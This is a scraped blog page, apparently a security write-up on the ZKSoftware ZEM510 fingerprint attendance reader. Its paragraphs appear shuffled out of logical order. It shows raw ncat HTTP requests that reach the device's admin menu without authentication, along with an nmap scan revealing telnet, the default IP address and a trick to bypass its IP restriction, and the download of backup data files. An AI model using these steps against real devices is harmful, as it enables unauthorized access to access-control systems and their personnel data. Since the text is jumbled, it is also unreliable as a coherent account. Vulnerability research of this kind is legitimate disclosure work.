barcodegaq.blogg.se

Zk software time attendance download












Peeking around we found that most of the files were illegible or empty, and decided to continue with the next gzipped file before going further.

    mnt/mtdblock/data:
    extlog.dat template.dat transaction.dat

    mnt/mtdblock:
    custattstate.dat custvoice.dat data/ dpmidx.dat extlog.dat extuser.dat oplog.dat sms.dat udata.dat user.dat workcode.dat

They are both gzipped, let’s extract them.


For this post we’re leaving web vulnerabilities aside and instead we’ll discuss just one major one, you’ll see why soon.

Downloading backup system data example.

Showing downloaded files:

    file *
    data.dat: gzip compressed data, max compression, from Unix
    device.dat: gzip compressed data, max compression, from Unix

Now that we completely control the web interface, we started looking for vulnerabilities that could lead to access to the Linux system that’s running below. The only difference would be that the anon user has to access the menu directly and the admin can make use of their fantastic “Web 3.0” login. We can conclude that an anonymous user and an administrator have the same privileges on the website, making session handling utterly useless. If the login page had a destroy session or something alike it would be considered a CSRF, which in this case, supposing that sessions were handled “properly”, meant the only “security” administrators had, but no, not even that. Response shows menu content loaded completely, and to make it even better you can see how bad they are handling sessions: the ‘Login off’ option is nothing more than a call to a JavaScript function that takes you to the login page.


Accessing /csl/menu (stripped content for clarity):

    ncat zkwebserver 80
    GET /csl/menu HTTP/1.1
    Host: zkwebserver

    HTTP/1.0 200 OK
    Server: ZK Web Server
    Pragma: no-cache
    Cache-control: no-cache
    Content-Type: text/html
    Connection: close

    Terminal
      javascript:oncwx() -> Login Off
      /csl/desktop -> Dev Status
    User Report
      /csl/report -> Report
      /csl/query -> Query
      /form/RealTime -> Monitor
    User Administration
      /csl/dpm -> Department
      /csl/user -> User
      /csl/user?action=add -> Add User
    Setting
      /form/Device?act=5 -> TCP/IP
      /form/Device?act=17 -> WIFI Setting
      /form/Device?act=3 -> Date/Time
      /form/Device?act=7 -> Change Password
    Terminal
      /form/Device?act=11 -> Backup
      /form/Device?act=14 -> Restore
      /form/Device?act=12 -> Update
      /csl/download -> Download
      /form/Device -> Reboot

So far we can't state for sure that calling /csl/menu directly will have the same effect. You can see that the web server replied with 200 OK and tried to load in framesets /csl/menu, /csl/desktop and /csl/header without asking for an auth.

Accessing /csl/start:

    ncat zkwebserver 80
    GET /csl/start HTTP/1.1
    Host: zkwebserver

    HTTP/1.0 200 OK
    Server: ZK Web Server
    Pragma: no-cache
    Cache-control: no-cache
    Content-Type: text/html
    Connection: close

Let’s see the requests in plaintext with ncat so you understand the gravity of the situation.

Showing empty cookie on console on start.csl

And we’re in. Port 23 seems to be a telnet service, we check if it’s legitimate:

Interesting ports, let’s dig up a little more.

Once we have a connection, an nmap port scan shows these results:

  • UDP 65535 : custom protocol that will respond to requests to broadcast and is used to find the fingerprint readers in the network.
  • TCP 23 : a classic telnet server (telnetd from busybox).
  • TCP 80 : the device is running a web server.


    We tried serial communication via USB, which creates a virtual serial port, using miniterm and screen, synchronizing the recommended baud rates and rebooting the device in order to expect some kind of prompt or output, but nothing came out of it :(

    Ethernet connection via UTP Cable

    After noticing that the network interface by default sets its IP address to 192.168.1.201 and has an access restriction by IP, we found out that setting our local one to 192.168.1.220 would do the trick.

    Looking for a way to communicate!

    Serial connection via USB

    Power supply: 12v, 1,5A and a 4hs additional battery.

    Reader: EM Marin 125 kHz, Protocol: Wiegand 26.

    Between the principal characteristics there are a few to highlight:


    Downloads and user manual also available. In their official websites you can find a detailed documentation about it. It’s a bio-metric fingerprint reader that’s supposed to provide controlled entrance of personnel and security to facilities. It’s made by ZKSoftware, which happens to have a reseller here, in Argentina. The specific name of the device is ZK-I01A ID GPRS, also known as ZEM510 and costs approximately U$200.

    At the back, there is a little tamper switch that will detect when the device is detached from the wall, and will trigger the alarm mode.

    Back view of the ZEM510 fingerprint reader.

    On plain sight we can find:












